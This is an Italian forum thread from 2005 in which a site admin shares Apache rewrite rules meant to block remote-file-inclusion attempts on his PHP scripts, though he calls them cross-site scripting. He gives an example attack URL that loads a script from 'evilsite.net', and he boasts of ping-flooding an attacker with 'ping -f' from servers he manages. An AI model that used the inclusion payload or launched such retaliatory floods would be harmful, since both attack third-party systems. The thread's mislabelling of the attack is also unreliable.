|
|||||||
|
|
|
 |
|
|
Strumenti |
15-04-2005, 00:00
|
#1 |
|
Senior Member
Iscritto dal: Jun 2000
Città: S.Giuliano (MI)
Messaggi: 1047
|
[PHP security] Cross site scripting
ho un problema che mi tormenta da tempo nei miei script php:
subiscono sempre attacchi cross site scripting (XSS) come prima "pezza" pensavo di usare le rewrite rule in apache. ho testato queste e sembrano funzionare Codice:
DocumentRoot /var/www
RewriteEngine on
RewriteCond %{THE_REQUEST} php[^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
RewriteCond %{THE_REQUEST} [?][^\ ]*(http|%68|%74|%70|%48|%54|%50) [NC]
RewriteRule . http://www.fuckyou.com/ [R]
poi allocherò del tempo per capire come si scrive per benino in php
__________________
“No te tomes tan en serio la vida, al fin y al cabo no saldrás vivo de ella” |
|
|
|
15-04-2005, 07:53
|
#2 |
|
Senior Member
Iscritto dal: Jun 2000
Città: S.Giuliano (MI)
Messaggi: 1047
|
ah , per chi non capisse cosa fa la modifica, provate ad andare su un qualsiasi script del sito, ad es.
http://www.gurutech.it/index.php e aggiungere alla fine, dopo il php, un ? e una stringa che contenga http, ad esempio Codice:
http://www.gurutech.it/index.php?sel=http://www.evilsite.net/badscript.txt
__________________
“No te tomes tan en serio la vida, al fin y al cabo no saldrás vivo de ella” |
|
|
|
|
15-04-2005, 21:01
|
#3 | |
|
Senior Member
Iscritto dal: Jun 2000
Città: S.Giuliano (MI)
Messaggi: 1047
|
funziona!
ho beccato il primo ' stardo. Quote:
EDIT: dopo qualche minuto di flood da un po' dei server che gestisco sono arrivato a "Destination host Unreachable" 
__________________
“No te tomes tan en serio la vida, al fin y al cabo no saldrás vivo de ella” Ultima modifica di gurutech : 15-04-2005 alle 21:04. |
|
|
|
|
|
15-04-2005, 21:11
|
#4 |
|
Senior Member
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
|
Per me è arabo, ma dovrei aver capito il "messaggio"
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12 |
|
|
|
|
15-04-2005, 21:32
|
#5 |
|
Senior Member
Iscritto dal: Mar 2002
Città: (MI)
Messaggi: 1111
|
Ho provato a fare quello che hai detto ma non ho capito.......
  
__________________
Perchè usare Formati Aperti? - Powered by: Ubuntu Hardy - FSFE Fellow 615 GUIDA : Shop Online AFFIDABILI! Ecco DOVE comprare! IOLAIR Monitor TFT 24'' Wide MB24W (6 ms) |
|
|
|
|
15-04-2005, 21:39
|
#6 |
|
Senior Member
Iscritto dal: Jun 2000
Città: S.Giuliano (MI)
Messaggi: 1047
|
scusate, traduco un po' in italiano:
il cross site scripting consiste nel prendere una pagina di un sito che contiene uno script (un programma) che può essere PHP, ASP, Perl o quant'altro, e cercare di costringere il web server ad eseguire un programma caricandolo da un'altro sito (nell'attacco da me ricevuto arrivava da http://www.derf.hpgvip.ig.com.br/) che non necessariamente è al corrente della cosa. Appena mi sono accorto dell'attacco, ho proceduto tramite ssh alla connessione su qualcuno dei server che gestisco, che hanno dai 2 ai 10 Mbit/s di banda ed ho eseguito un ping flood (comando: ping -f) cioè un ping che continua ad inondare di pacchetti la destinazione senza aspettare da questa una risposta. Le connessioni comuni generalmente cadono sotto un attacco del genere ben sferrato. EDIT: ovviamente subito dopo sono partite le email verso i provider interessati
__________________
“No te tomes tan en serio la vida, al fin y al cabo no saldrás vivo de ella” Ultima modifica di gurutech : 15-04-2005 alle 21:56. |
|
|
|
|
15-04-2005, 21:41
|
#7 |
|
Senior Member
Iscritto dal: Jun 2000
Città: S.Giuliano (MI)
Messaggi: 1047
|
mezzelfo hai provato tu con
www.tyrael.it ?
__________________
“No te tomes tan en serio la vida, al fin y al cabo no saldrás vivo de ella” |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 22:33.
